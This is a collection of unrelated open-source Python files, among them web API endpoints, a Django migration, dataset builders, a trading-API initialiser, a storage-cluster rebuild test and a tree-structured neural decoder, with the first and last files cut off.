_endpoint_route = lambda x: app_saved_reply_endpoints.route(URL_BASE + x, methods=['GET', 'POST'])
@_endpoint_route('/saved-replies/get-saved-replies')
@respond_with_json
@list_response
@list_saved_reply_ids
@requires_auth
def _get_saved_replies(request, number_of_items=30, offset=0, saved_reply_ids=None):
user_token = request['user'].token
search_term = optional_parameter(request, 'searchTerm', None)
saved_replies = AnnotationStore.get_annotations(user_token, annotation_ids=saved_reply_ids,
search_term=search_term, saved_replies=True)
return {'totalItems': len(saved_replies),
'items': saved_replies[offset:offset+number_of_items]}
@_endpoint_route('/saved-replies/add-saved-reply')
@respond_with_json
@requires_auth
def _create_saved_reply(request):
user_token = request['user'].token
question = required_parameter(request, 'question')
answer = required_parameter(request, 'answer')
response = AnnotationStore.create_annotation(user_token, question, answer)
return {'replyId': response['annotationId'], 'answerId': response['answerId']}
@_endpoint_route('/saved-replies/delete-saved-reply')
@respond_with_json
@requires_auth
def _delete_saved_reply(request):
user_token = request['user'].token
reply_id = required_parameter(request, 'replyId')
AnnotationStore.delete_annotation(user_token, reply_id)
return {'replyId': reply_id}
@_endpoint_route('/saved-replies/edit-canonical-question')
@respond_with_json
@requires_auth
def _edit_canonical_question(request):
user_token = request['user'].token
reply_id = required_parameter(request, 'replyId')
question = required_parameter(request, 'question')
AnnotationStore.edit_canonical_question(user_token, reply_id, question)
return {'replyId': reply_id}
@_endpoint_route('/saved-replies/add-paraphrase-question')
@respond_with_json
@requires_auth
def _add_paraphrase_question(request):
user_token = request['user'].token
reply_id = required_parameter(request, 'replyId')
question = required_parameter(request, 'question')
return AnnotationStore.add_paraphrase_question(user_token, reply_id, question)
@_endpoint_route('/saved-replies/edit-paraphrase-question')
@respond_with_json
@requires_auth
def _edit_paraphrase_question(request):
user_token = request['user'].token
question_id = required_parameter(request, 'questionId')
question = required_parameter(request, 'question')
return AnnotationStore.edit_paraphrase_question(user_token, question_id, question)
@_endpoint_route('/saved-replies/delete-paraphrase-question')
@respond_with_json
@requires_auth
def _delete_paraphrase_question(request):
user_token = request['user'].token
question_id = required_parameter(request, 'questionId')
return AnnotationStore.delete_paraphrase_question(user_token, question_id)
@_endpoint_route('/saved-replies/add-answer')
@respond_with_json
@requires_auth
def _add_answer(request):
user_token = request['user'].token
reply_id = required_parameter(request, 'replyId')
answer = required_parameter(request, 'answer')
return AnnotationStore.add_answer(user_token, reply_id, answer)
@_endpoint_route('/saved-replies/edit-answer')
@respond_with_json
@requires_auth
def _edit_answer(request):
user_token = request['user'].token
answer_id = required_parameter(request, 'answerId')
answer = required_parameter(request, 'answer')
return AnnotationStore.edit_answer(user_token, answer_id, answer)
@_endpoint_route('/saved-replies/delete-answer')
@respond_with_json
@requires_auth
def _delete_answer(request):
user_token = request['user'].token
answer_id = required_parameter(request, 'answerId')
return AnnotationStore.delete_answer(user_token, answer_id)
if __name__ == '__main__':
# import sanic.response
#
# # Create a fake request
# request = {
# "user": {
# "token": "test_user_token",
# },
# "args": {
# "token": '<KEY>',
# "question": 'What is a potato?',
# "answer": 'A potato is a vegetable',
# }
# }
# response: sanic.response.HTTPResponse = _create_saved_reply(request)
# print(response.body)
pass
|
dojo/db_migrations/0013_jira_info_level.py
|
mtcolman/django-DefectDojo
| 1,772 |
88345
|
# Generated by Django 2.2.1 on 2019-08-01 16:34
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('dojo', '0012_jira_finding_age'),
]
operations = [
migrations.AddField(
model_name='jira_conf',
name='info_mapping_severity',
field=models.CharField(help_text="Maps to the 'Priority' field in Jira. For example: Info", max_length=200),
),
migrations.AlterField(
model_name='system_settings',
name='jira_minimum_severity',
field=models.CharField(blank=True, choices=[('Critical', 'Critical'), ('High', 'High'), ('Medium', 'Medium'), ('Low', 'Low'), ('Info', 'Info')], default='None', max_length=20, null=True),
),
]
|
docs/tools/chineselink.py
|
nbl97/nni
| 2,305 |
88388
|
"""
This is to keep Chinese doc update to English doc. Should be run regularly.
There is no sane way to check the contents though. PR review should enforce contributors to update the corresponding translation.
See https://github.com/microsoft/nni/issues/4298 for discussion.
Under docs, run
python tools/chineselink.py
"""
import hashlib
import shutil
import sys
from pathlib import Path
def iterate_dir(path):
for p in Path(path).iterdir():
if p.is_dir():
yield from iterate_dir(p)
continue
yield p
suffix_list = [
'.html',
'.md',
'.rst',
'.ipynb',
]
pipeline_mode = len(sys.argv) > 1 and sys.argv[1] == 'check'
failed_files = []
# in case I need to change `_zh` to something else
# files = list(filter(lambda d: d.name.endswith('zh_CN.rst'), iterate_dir('source')))
# for file in files:
# os.rename(file, file.parent / (file.name[:-7] + file.name[-4:]))
def need_to_translate(source, target):
if not target.exists():
failed_files.append('(missing) ' + target.as_posix())
if pipeline_mode:
return
shutil.copyfile(source, target)
if target.suffix == '.html':
return # FIXME I don't know how to process html
target_checksum = hashlib.sha256(path.open('rb').read()).hexdigest()[:32]
checksum = target.open('r').readline().strip()[3:]
if checksum != target_checksum:
failed_files.append('(out-of-date) ' + target.as_posix())
if pipeline_mode:
return
contents = target.open('r').readlines()
firstline = '.. ' + target_checksum + '\n'
if contents[0].startswith('.. '):
contents = [firstline] + contents[1:]
else:
contents = [firstline, '\n'] + contents
target.open('w').writelines(contents)
for path in iterate_dir(Path('source')):
relative_path = path.relative_to('source')
if relative_path.as_posix().startswith('_build'):
continue
if path.suffix in suffix_list:
if '_zh.' not in path.name:
target_path = path.parent / (path.stem + '_zh' + path.suffix)
if target_path.exists():
# whitelist files. should be translated
need_to_translate(path, target_path)
print(f'Skipped linking for {path} as it is in whitelist.')
else:
source_path = path.parent / (path.stem[:-3] + path.suffix)
if not source_path.exists():
# delete redundant files
failed_files.append('(redundant) ' + source_path.as_posix())
if not pipeline_mode:
print(f'Deleting {source_path}')
path.unlink()
if pipeline_mode and failed_files:
raise ValueError(
'The following files are not up-to-date. Please run "python3 tools/chineselink.py" under docs folder '
'to refresh them and update their corresponding translation.\n' + '\n'.join([' ' + line for line in failed_files]))
if failed_files:
print('Updated files:', failed_files)
|
create_data.py
|
pengzhou93/dancenet
| 499 |
88396
|
<gh_stars>100-1000
import cv2
import numpy as np
VIDEO_PATH = 'data.mkv'
kernel = np.ones((2,2),np.uint8)
cap = cv2.VideoCapture(VIDEO_PATH)
data = []
count = 1
limit = 0
while(cap.isOpened()):
ret, image_np = cap.read()
if ret == False:
break
if limit == 3:
limit = 0
#image_np = 255 - image_np
image_np = cv2.resize(image_np,(208,120))
#ret,image_np = cv2.threshold(image_np,127,255,cv2.THRESH_BINARY)
bg_index = np.where(np.greater(image_np,20))
image_np[bg_index] = 255
image_np = cv2.cvtColor(image_np, cv2.COLOR_BGR2GRAY)
#(T, thresh) = cv2.threshold(image_np, 0, 255, cv2.THRESH_BINARY)
cv2.imwrite("imgs/{}.jpg".format(count),image_np)
print("{}.jpg".format(count))
count += 1
limit += 1
|
Lib/objc/_CoreFollowUp.py
|
snazari/Pyto
| 701 |
88418
|
"""
Classes from the 'CoreFollowUp' framework.
"""
try:
from rubicon.objc import ObjCClass
except ValueError:
def ObjCClass(name):
return None
def _Class(name):
try:
return ObjCClass(name)
except NameError:
return None
FLApprovedItemsFilter = _Class("FLApprovedItemsFilter")
FLHSA2PasswordResetNotification = _Class("FLHSA2PasswordResetNotification")
FLItemChangeObserver = _Class("FLItemChangeObserver")
FLApprovedItemsDecorator = _Class("FLApprovedItemsDecorator")
FLHSA2LoginNotification = _Class("FLHSA2LoginNotification")
FLDaemon = _Class("FLDaemon")
FLGroupViewModelImpl = _Class("FLGroupViewModelImpl")
FLTopLevelViewModel = _Class("FLTopLevelViewModel")
FLHeadlessExtensionLoader = _Class("FLHeadlessExtensionLoader")
FLItemDetailViewModel = _Class("FLItemDetailViewModel")
FLFollowUpAction = _Class("FLFollowUpAction")
FLFollowUpNotification = _Class("FLFollowUpNotification")
FLEnvironment = _Class("FLEnvironment")
FLHeadlessActionHandler = _Class("FLHeadlessActionHandler")
FLTelemetryAggregateController = _Class("FLTelemetryAggregateController")
FLFollowUpController = _Class("FLFollowUpController")
FLUtilities = _Class("FLUtilities")
FLTelemetryFactory = _Class("FLTelemetryFactory")
FLFollowUpItem = _Class("FLFollowUpItem")
FLConstants = _Class("FLConstants")
FLTelemetryProcessor = _Class("FLTelemetryProcessor")
FLExtensionHostContext = _Class("FLExtensionHostContext")
|
net/data/path_builder_unittest/self_issued_prioritization/generate-certs.py
|
zealoussnow/chromium
| 14,668 |
88420
|
#!/usr/bin/env python
# Copyright 2021 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
A chain with a self-signed Root1 and a Root1 cross signed by Root2. The
cross-signed root has a newer notBefore date than the self-signed one.
"""
import sys
sys.path += ['../..']
import gencerts
DATE_A = '150101120000Z'
DATE_B = '150102120000Z'
DATE_Z = '180101120000Z'
root1 = gencerts.create_self_signed_root_certificate('Root1')
root1.set_validity_range(DATE_A, DATE_Z)
root2 = gencerts.create_self_signed_root_certificate('Root2')
root2.set_validity_range(DATE_A, DATE_Z)
root1_cross = gencerts.create_intermediate_certificate('Root1', root2)
root1_cross.set_key(root1.get_key())
root1_cross.set_validity_range(DATE_B, DATE_Z)
target = gencerts.create_end_entity_certificate('Target', root1)
target.set_validity_range(DATE_A, DATE_Z)
gencerts.write_chain('Root1', [root1], out_pem='root1.pem')
gencerts.write_chain('Root2', [root2], out_pem='root2.pem')
gencerts.write_chain(
'Root1 cross-signed by Root2, with a newer notBefore date'
' than Root1', [root1_cross],
out_pem='root1_cross.pem')
gencerts.write_chain('Target', [target], out_pem='target.pem')
|
ParlAI/parlai/tasks/hotpotqa/build.py
|
UmaTaru/run
| 163 |
88450
|
<gh_stars>100-1000
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
# Download and build the data if it does not exist.
import parlai.core.build_data as build_data
import os
import json
VERSION = '1'
TRAIN_FILENAME = 'hotpot_train_v{}.1.json'.format(VERSION)
DEV_DISTRACTOR_FILENAME = 'hotpot_dev_distractor_v{}.json'.format(VERSION)
DEV_FULLWIKI_FILENAME = 'hotpot_dev_fullwiki_v{}.json'.format(VERSION)
URL = 'http://curtis.ml.cmu.edu/datasets/hotpot/'
OUTPUT_FORMAT = 'text:{context_question}\t' 'labels:{answer}'
def _handle_data_point(data_point):
output = []
context_question_txt = ""
for [title, sentences_list] in data_point['context']:
sentences = '\\n'.join(sentences_list)
context_question_txt += '{}\\n{}\\n\\n'.format(title, sentences)
context_question_txt += data_point['question']
output = OUTPUT_FORMAT.format(
context_question=context_question_txt, answer=data_point['answer']
)
output += '\t\tepisode_done:True\n'
return output
def make_parlai_format(outpath, dtype, data):
print('building parlai:' + dtype)
with open(os.path.join(outpath, dtype + '.txt'), 'w') as fout:
for data_point in data:
fout.write(_handle_data_point(data_point))
def build(opt):
dpath = os.path.join(opt['datapath'], 'HotpotQA')
if not build_data.built(dpath, version_string=VERSION):
print('[building data: ' + dpath + ']')
if build_data.built(dpath):
# An older version exists, so remove these outdated files.
build_data.remove_dir(dpath)
build_data.make_dir(dpath)
# Download the data.
build_data.download(URL + TRAIN_FILENAME, dpath, TRAIN_FILENAME)
build_data.download(
URL + DEV_DISTRACTOR_FILENAME, dpath, DEV_DISTRACTOR_FILENAME
)
build_data.download(URL + DEV_FULLWIKI_FILENAME, dpath, DEV_FULLWIKI_FILENAME)
with open(os.path.join(dpath, TRAIN_FILENAME)) as f:
data = json.load(f)
make_parlai_format(dpath, 'train', data)
with open(os.path.join(dpath, DEV_DISTRACTOR_FILENAME)) as f:
data = json.load(f)
make_parlai_format(dpath, 'valid_distractor', data)
with open(os.path.join(dpath, DEV_FULLWIKI_FILENAME)) as f:
data = json.load(f)
make_parlai_format(dpath, 'valid_fullwiki', data)
# Mark the data as built.
build_data.mark_done(dpath, version_string=VERSION)
|
ijson/backends/yajl2_c.py
|
simonw/ijson
| 394 |
88451
|
<gh_stars>100-1000
#
# Contributed by <NAME> <<EMAIL>>
#
# ICRAR - International Centre for Radio Astronomy Research
# (c) UWA - The University of Western Australia, 2016
# Copyright by UWA (in the framework of the ICRAR)
#
'''
Wrapper for _yajl2 C extension module
'''
from ijson import common, compat, utils
from . import _yajl2
_get_buf_size = lambda kwargs: kwargs.pop('buf_size', 64 * 1024)
@utils.coroutine
def basic_parse_basecoro(target, **kwargs):
return _yajl2.basic_parse_basecoro(target.send, **kwargs)
def basic_parse_gen(file, **kwargs):
f = compat.bytes_reader(file)
buf_size = _get_buf_size(kwargs)
return _yajl2.basic_parse(f, buf_size, **kwargs)
def basic_parse_async(file, **kwargs):
buf_size = _get_buf_size(kwargs)
return _yajl2.basic_parse_async(file, buf_size, **kwargs)
@utils.coroutine
def parse_basecoro(target, **kwargs):
return _yajl2.parse_basecoro(target.send, **kwargs)
def parse_gen(file, **kwargs):
f = compat.bytes_reader(file)
buf_size = _get_buf_size(kwargs)
return _yajl2.parse(f, buf_size, **kwargs)
def parse_async(file, **kwargs):
buf_size = _get_buf_size(kwargs)
return _yajl2.parse_async(file, buf_size, **kwargs)
@utils.coroutine
def kvitems_basecoro(target, prefix, map_type=None, **kwargs):
return _yajl2.kvitems_basecoro(target.send, prefix, map_type, **kwargs)
def kvitems_gen(file, prefix, map_type=None, **kwargs):
f = compat.bytes_reader(file)
buf_size = _get_buf_size(kwargs)
return _yajl2.kvitems(f, buf_size, prefix, map_type, **kwargs)
def kvitems_async(file, prefix, map_type=None, **kwargs):
buf_size = _get_buf_size(kwargs)
return _yajl2.kvitems_async(file, buf_size, prefix, map_type, **kwargs)
@utils.coroutine
def items_basecoro(target, prefix, map_type=None, **kwargs):
return _yajl2.items_basecoro(target.send, prefix, map_type, **kwargs)
def items_gen(file, prefix, map_type=None, **kwargs):
f = compat.bytes_reader(file)
buf_size = _get_buf_size(kwargs)
return _yajl2.items(f, buf_size, prefix, map_type, **kwargs)
def items_async(file, prefix, map_type=None, **kwargs):
buf_size = _get_buf_size(kwargs)
return _yajl2.items_async(file, buf_size, prefix, map_type, **kwargs)
common.enrich_backend(globals())
|
predefined_functions/initialisation.py
|
g-make-it/IG_Trading_Algo_Scripts_Python
| 186 |
88456
|
<reponame>g-make-it/IG_Trading_Algo_Scripts_Python
from trading_ig import IGService
from trading_ig.config import config
import logging
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
# if you need to cache to DB your requests
from datetime import timedelta
import requests_cache
class Initialisation():
def __init__(self):
logging.basicConfig(level=logging.INFO)
self.counter = -1
self.initialise_connection()
def initialise_connection(self):
key = self.increment_api_key()
# expire_after = timedelta(hours=1)
# session = requests_cache.CachedSession(
# cache_name='cache', backend='sqlite', expire_after=expire_after
# )
# set expire_after=None if you don't want cache expiration
# set expire_after=0 if you don't want to cache queries
# no cache
ig_service = IGService(
config.username, config.password, key, config.acc_type
)
# if you want to globally cache queries
# ig_service = IGService(config.username, config.password, config.api_key, config.acc_type, session)
return ig_service
# make sure once the object is received to the place were it is needed you createSession() to initialise the session
def increment_api_key(self):
key = ""
while (True):
try:
self.counter += 1
# has 12000 api keys
fp = open("D:\Stock_Analysis\ig-markets-api-python-library-master\generate_api_keys\IG_api_keys_raw.txt")
for i, line in enumerate(fp):
if i == self.counter:
key = line.split("\n")[0]
fp.close()
return key
raise Exception("file has surpassed the last api key")
except:
fp.close()
self.counter = -1
|
tests/pydecompile-test/decompiler-baselines/string_length.py
|
jaydeetay/pxt
| 977 |
88459
|
<gh_stars>100-1000
x = "Okay"
y = len(x)
|
tests/e2e/kcs/test_noobaa_rebuild.py
|
annagitel/ocs-ci
| 130 |
88471
|
<reponame>annagitel/ocs-ci<filename>tests/e2e/kcs/test_noobaa_rebuild.py<gh_stars>100-1000
import logging
import pytest
from ocs_ci.framework.testlib import (
ignore_leftovers,
E2ETest,
tier3,
skipif_openshift_dedicated,
skipif_external_mode,
)
from ocs_ci.helpers.sanity_helpers import Sanity
from ocs_ci.ocs import constants, defaults
from ocs_ci.ocs.constants import DEFAULT_NOOBAA_BUCKETCLASS, DEFAULT_NOOBAA_BACKINGSTORE
from ocs_ci.ocs.ocp import OCP
from ocs_ci.ocs.resources.pod import get_noobaa_pods
from ocs_ci.ocs.resources.pvc import get_pvc_objs
logger = logging.getLogger(__name__)
@tier3
@ignore_leftovers
@pytest.mark.polarion_id("OCS-2653")
@pytest.mark.bugzilla("1991361")
@pytest.mark.bugzilla("2019577")
@skipif_openshift_dedicated
@skipif_external_mode
class TestNoobaaRebuild(E2ETest):
"""
Test to verify noobaa rebuild.
"""
@pytest.fixture(autouse=True)
def init_sanity(self):
"""
Initialize Sanity instance
"""
self.sanity_helpers = Sanity()
@pytest.fixture(autouse=True)
def teardown_fixture(self, request):
"""
Teardown function
"""
def finalizer():
# Get the deployment replica count
deploy_obj = OCP(
kind=constants.DEPLOYMENT,
namespace=constants.OPENSHIFT_STORAGE_NAMESPACE,
)
noobaa_deploy_obj = deploy_obj.get(
resource_name=constants.NOOBAA_OPERATOR_DEPLOYMENT
)
if noobaa_deploy_obj["spec"]["replicas"] != 1:
logger.info(
f"Scaling back {constants.NOOBAA_OPERATOR_DEPLOYMENT} deployment to replica: 1"
)
deploy_obj.exec_oc_cmd(
f"scale deployment {constants.NOOBAA_OPERATOR_DEPLOYMENT} --replicas=1"
)
request.addfinalizer(finalizer)
def test_noobaa_rebuild(self, bucket_factory):
"""
Test case to verify noobaa rebuild. Verifies KCS: https://access.redhat.com/solutions/5948631
1. Stop the noobaa-operator by setting the replicas of noobaa-operator deployment to 0.
2. Delete the noobaa deployments/statefulsets.
3. Delete the PVC db-noobaa-db-0.
4. Patch existing backingstores and bucketclasses to remove finalizer
5. Delete the backingstores/bucketclass.
6. Delete the noobaa secrets.
7. Restart noobaa-operator by setting the replicas back to 1.
8. Monitor the pods in openshift-storage for noobaa pods to be Running.
"""
dep_ocp = OCP(
kind=constants.DEPLOYMENT, namespace=constants.OPENSHIFT_STORAGE_NAMESPACE
)
state_ocp = OCP(
kind=constants.STATEFULSET, namespace=constants.OPENSHIFT_STORAGE_NAMESPACE
)
noobaa_pvc_obj = get_pvc_objs(pvc_names=["db-noobaa-db-pg-0"])
# Scale down noobaa operator
logger.info(
f"Scaling down {constants.NOOBAA_OPERATOR_DEPLOYMENT} deployment to replica: 0"
)
dep_ocp.exec_oc_cmd(
f"scale deployment {constants.NOOBAA_OPERATOR_DEPLOYMENT} --replicas=0"
)
# Delete noobaa deployments and statefulsets
logger.info("Deleting noobaa deployments and statefulsets")
dep_ocp.delete(resource_name=constants.NOOBAA_ENDPOINT_DEPLOYMENT)
state_ocp.delete(resource_name=constants.NOOBAA_DB_STATEFULSET)
state_ocp.delete(resource_name=constants.NOOBAA_CORE_STATEFULSET)
# Delete noobaa-db pvc
pvc_obj = OCP(
kind=constants.PVC, namespace=constants.OPENSHIFT_STORAGE_NAMESPACE
)
logger.info("Deleting noobaa-db pvc")
pvc_obj.delete(resource_name=noobaa_pvc_obj[0].name, wait=True)
pvc_obj.wait_for_delete(resource_name=noobaa_pvc_obj[0].name, timeout=300)
# Patch and delete existing backingstores
params = '{"metadata": {"finalizers":null}}'
bs_obj = OCP(
kind=constants.BACKINGSTORE, namespace=constants.OPENSHIFT_STORAGE_NAMESPACE
)
for bs in bs_obj.get()["items"]:
assert bs_obj.patch(
resource_name=bs["metadata"]["name"],
params=params,
format_type="merge",
), "Failed to change the parameter in backingstore"
logger.info(f"Deleting backingstore: {bs['metadata']['name']}")
bs_obj.delete(resource_name=bs["metadata"]["name"])
# Patch and delete existing bucketclass
bc_obj = OCP(
kind=constants.BUCKETCLASS, namespace=constants.OPENSHIFT_STORAGE_NAMESPACE
)
for bc in bc_obj.get()["items"]:
assert bc_obj.patch(
resource_name=bc["metadata"]["name"],
params=params,
format_type="merge",
), "Failed to change the parameter in bucketclass"
logger.info(f"Deleting bucketclass: {bc['metadata']['name']}")
bc_obj.delete(resource_name=bc["metadata"]["name"])
# Delete noobaa secrets
logger.info("Deleting noobaa related secrets")
dep_ocp.exec_oc_cmd(
"delete secrets noobaa-admin noobaa-endpoints noobaa-operator noobaa-server noobaa-root-master-key"
)
# Scale back noobaa-operator deployment
logger.info(
f"Scaling back {constants.NOOBAA_OPERATOR_DEPLOYMENT} deployment to replica: 1"
)
dep_ocp.exec_oc_cmd(
f"scale deployment {constants.NOOBAA_OPERATOR_DEPLOYMENT} --replicas=1"
)
# Wait and validate noobaa PVC is in bound state
pvc_obj.wait_for_resource(
condition=constants.STATUS_BOUND,
resource_name=noobaa_pvc_obj[0].name,
timeout=600,
sleep=120,
)
# Validate noobaa pods are up and running
pod_obj = OCP(kind=constants.POD, namespace=defaults.ROOK_CLUSTER_NAMESPACE)
noobaa_pods = get_noobaa_pods()
pod_obj.wait_for_resource(
condition=constants.STATUS_RUNNING,
resource_count=len(noobaa_pods),
selector=constants.NOOBAA_APP_LABEL,
timeout=900,
)
# Verify everything running fine
logger.info("Verifying all resources are Running and matches expected result")
self.sanity_helpers.health_check(tries=120)
# Verify default backingstore/bucketclass
default_bs = OCP(
kind=constants.BACKINGSTORE, namespace=constants.OPENSHIFT_STORAGE_NAMESPACE
).get(resource_name=DEFAULT_NOOBAA_BACKINGSTORE)
default_bc = OCP(
kind=constants.BUCKETCLASS, namespace=constants.OPENSHIFT_STORAGE_NAMESPACE
).get(resource_name=DEFAULT_NOOBAA_BUCKETCLASS)
assert (
default_bs["status"]["phase"]
== default_bc["status"]["phase"]
== constants.STATUS_READY
), "Failed: Default bs/bc are not in ready state"
# Create OBCs
logger.info("Creating OBCs after noobaa rebuild")
bucket_factory(amount=3, interface="OC", verify_health=True)
|
tests/test_new.py
|
Mayitzin/ahrs
| 184 |
88491
|
<gh_stars>100-1000
#! /usr/bin/python3
# -*- coding: utf-8 -*-
"""
Pytest-based testing
====================
This file performs automated tests with pytest. It does not generate charts
or output to be reviewed.
Run with: pytest-3 tests/test_new.py
Run with: pytest-3 tests/test_new.py -s -vv --cov=ahrs for coverage + verbose
Copyright 2021 <NAME> and <NAME> <<EMAIL>>
Released under MIT License
Formatted with Black
References
----------
.. [Crassidis] <NAME> (2007) A Survey of Nonlinear Attitude
Estimation Methods.
.. [Teage] <NAME> (2016) Comparison of Attitude Estimation Techniques for
Low-cost Unmanned Aerial Vehicles.
https://arxiv.org/pdf/1602.07733.pdf
http://ancs.eng.buffalo.edu/pdf/ancs_papers/2007/att_survey07.pdf
.. [Cirillo] <NAME> et al. (2016) A comparison of multisensor attitude
estimation algorithms.
https://www.researchgate.net/profile/Pasquale_Cirillo/publication/303738116_A_comparison_of_multisensor_attitude_estimation_algorithms/links/5750181208aeb753e7b4a0c0/A-comparison-of-multisensor-attitude-estimation-algorithms.pdf
"""
import numpy as np
import pytest
import scipy.io as sio
import ahrs
import ahrs.utils.io
DEG2RAD = ahrs.common.DEG2RAD
class Data:
acc = None
gyr = None
mag = None
@pytest.fixture()
def data():
fn = "tests/ExampleData.mat"
mat = sio.loadmat(fn)
d = Data()
d.acc = mat["Accelerometer"]
d.gyr = mat["Gyroscope"]
d.mag = mat["Magnetometer"]
d.num_samples = len(d.acc)
assert d.num_samples
assert len(d.acc[0]) == 3
assert len(d.gyr[0]) == 3
assert len(d.mag[0]) == 3
return d
def check_integrity(Q):
assert Q is not None
sz = Q.shape
qts_ok = not np.allclose(np.sum(Q, axis=0), sz[0] * np.array([1.0, 0.0, 0.0, 0.0]))
qnm_ok = np.allclose(np.linalg.norm(Q, axis=1).mean(), 1.0)
assert qts_ok and qnm_ok
@pytest.fixture()
def Q(data):
q = np.zeros((data.num_samples, 4))
q[:, 0] = 1.0
return q
def test_fourati(data, Q):
fourati = ahrs.filters.Fourati()
for t in range(1, data.num_samples):
Q[t] = fourati.update(Q[t - 1], DEG2RAD * data.gyr[t], data.acc[t], data.mag[t])
# check_integrity(Q)
assert tuple(Q[0]) == (
0.9999984512506995,
-7.923098356158542e-05,
-0.00010998618261451432,
7.783371117384885e-05,
)
assert tuple(Q[-1]) == (
0.8321632262796078,
0.17064875423856807,
-0.27862737470349475,
0.44805150772046,
)
def test_ekf(data, Q):
ekf = ahrs.filters.EKF()
for t in range(1, data.num_samples):
Q[t] = ekf.update(Q[t - 1], DEG2RAD * data.gyr[t], data.acc[t], data.mag[t])
check_integrity(Q)
assert tuple(Q[0]) == (1.0, 0.0, 0.0, 0.0)
assert tuple(Q[1]) == (
0.9948152433072915,
0.030997430898554206,
-0.09666743395232329,
0.006099030596487108,
)
assert tuple(Q[-1]) == (
0.08996443890695231,
0.23991941374716044,
-0.958073763949303,
-0.1282175396402196,
)
def test_mahony(data, Q):
mahony = ahrs.filters.Mahony()
for t in range(1, data.num_samples):
Q[t] = mahony.updateMARG(
Q[t - 1], DEG2RAD * data.gyr[t], data.acc[t], data.mag[t]
)
check_integrity(Q)
assert tuple(Q[0]) == (
0.9999883099133865,
-0.0007983637760660701,
0.004762298093153807,
0.00025133388483027455,
)
assert tuple(Q[-1]) == (
-0.10375763267292282,
-0.007875376758085736,
-0.05233084545763538,
0.9931937448034588,
)
def test_madgwick(data, Q):
madgwick = ahrs.filters.Madgwick()
for t in range(1, data.num_samples):
Q[t] = madgwick.updateMARG(
Q[t - 1], DEG2RAD * data.gyr[t], data.acc[t], data.mag[t]
)
check_integrity(Q)
assert tuple(Q[0]) == (
0.999999906169997,
-0.00039564882735884275,
-0.00017641407301677547,
-2.78332338967451e-07,
)
assert tuple(Q[-1]) == (
0.9524138044137933,
-0.10311931931141746,
0.0038985200624795592,
0.28680856453062387,
)
def test_distance():
a = np.random.random((2, 3))
d = ahrs.utils.metrics.euclidean(a[0], a[1])
assert np.allclose(d, np.linalg.norm(a[0] - a[1]))
|
trains/backend_api/session/__init__.py
|
doliveralg/trains
| 112 |
88513
|
<reponame>doliveralg/trains
from .session import Session
from .datamodel import DataModel, NonStrictDataModel, schema_property, StringEnum
from .request import Request, BatchRequest, CompoundRequest
from .response import Response
from .token_manager import TokenManager
from .errors import TimeoutExpiredError, ResultNotReadyError
from .callresult import CallResult
|
graph4nlp/pytorch/modules/prediction/generation/TreeBasedDecoder.py
|
cminusQAQ/graph4nlp
| 1,269 |
88530
|
<gh_stars>1000+
import random
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from graph4nlp.pytorch.modules.utils.tree_utils import Tree, to_cuda
from .attention import Attention
from .base import RNNTreeDecoderBase
class StdTreeDecoder(RNNTreeDecoderBase):
r"""StdTreeDecoder: This is a tree decoder implementation, which is used for tree object decoding.
Attributes
----------
attn_type : str,
Describe which attention mechanism is used, can be ``uniform``,
``separate_on_encoder_type``, ``separate_on_node_type``.
embeddings : torch.nn.Module,
Embedding layer, input is tensor of word index, output is word embedding tensor.
enc_hidden_size : int,
Size of encoder hidden state.
dec_emb_size : int,
Size of decoder word embedding layer output size.
dec_hidden_size : int,
Size of decoder hidden state. (namely the ``lstm`` or ``gru``
hidden size when rnn unit has been specified)
output_size : int,
Size of output vocabulary size.
teacher_force_ratio : float,
The ratio of possibility to use teacher force training.
use_sibling : boolean,
Whether feed sibling state in each decoding step.
use_copy : boolean,
Whether use copy mechanism in decoding.
fuse_strategy: str, option=[None, "average", "concatenate"], default=None
The strategy to fuse attention results generated by separate attention.
"None": If we do ``uniform`` attention, we will set it to None.
"``average``": We will take an average on all results.
"``concatenate``": We will concatenate all results to one.
num_layers : int, optional,
Layer number of decoder rnn unit.
dropout_for_decoder: float,
Dropout ratio for decoder(include both the dropout for word embedding
and the dropout for attention layer)
tgt_vocab : object,
The vocab object used in decoder, including all the word<->id pairs
appeared in the output sentences.
graph_pooling_strategy : str,
The graph pooling strategy used to generate the graph embedding with node embeddings
rnn_type: str, optional,
The rnn unit is used, option=["lstm", "gru"], default="lstm".
max_dec_seq_length : int, optional,
In decoding, the decoding steps upper limit.
max_dec_tree_depth : int, optional,
In decoding, the tree depth lower limit.
"""
def __init__(
self,
attn_type,
embeddings,
enc_hidden_size,
dec_emb_size,
dec_hidden_size,
output_size,
criterion,
teacher_force_ratio,
use_sibling=True,
use_attention=True,
use_copy=False,
fuse_strategy="average",
num_layers=1,
dropout_for_decoder=0.1,
rnn_type="lstm",
max_dec_seq_length=512,
max_dec_tree_depth=256,
tgt_vocab=None,
graph_pooling_strategy="max",
):
super(StdTreeDecoder, self).__init__(
use_attention=True,
use_copy=use_copy,
use_coverage=False,
attention_type="uniform",
fuse_strategy="average",
)
self.num_layers = num_layers
self.criterion = criterion
self.rnn_size = dec_hidden_size
self.enc_hidden_size = enc_hidden_size
self.hidden_size = dec_hidden_size
self.max_dec_seq_length = max_dec_seq_length
self.max_dec_tree_depth = max_dec_tree_depth
self.tgt_vocab = tgt_vocab
self.teacher_force_ratio = teacher_force_ratio
self.use_sibling = use_sibling
self.dec_emb_size = dec_emb_size
self.dropout_input = dropout_for_decoder
self.embeddings = embeddings
self.graph_pooling_strategy = graph_pooling_strategy
self.attn_state = {}
self.use_copy = use_copy
self.attention = Attention(
query_size=dec_hidden_size,
memory_size=enc_hidden_size * 2
if (enc_hidden_size * 2 == dec_hidden_size)
else enc_hidden_size,
hidden_size=dec_hidden_size,
has_bias=True,
dropout=dropout_for_decoder,
attention_funtion="dot",
)
self.separate_attn = attn_type != "uniform"
if self.separate_attn:
self.linear_att = nn.Linear(3 * dec_hidden_size, dec_hidden_size)
else:
self.linear_att = nn.Linear(2 * dec_hidden_size, dec_hidden_size)
self.linear_out = nn.Linear(dec_hidden_size, output_size)
self.dropout_attn = nn.Dropout(dropout_for_decoder)
self.logsoftmax = nn.LogSoftmax(dim=1)
if self.use_copy:
ptr_size = self.embeddings.embedding_dim
ptr_size += 4 * self.rnn_size
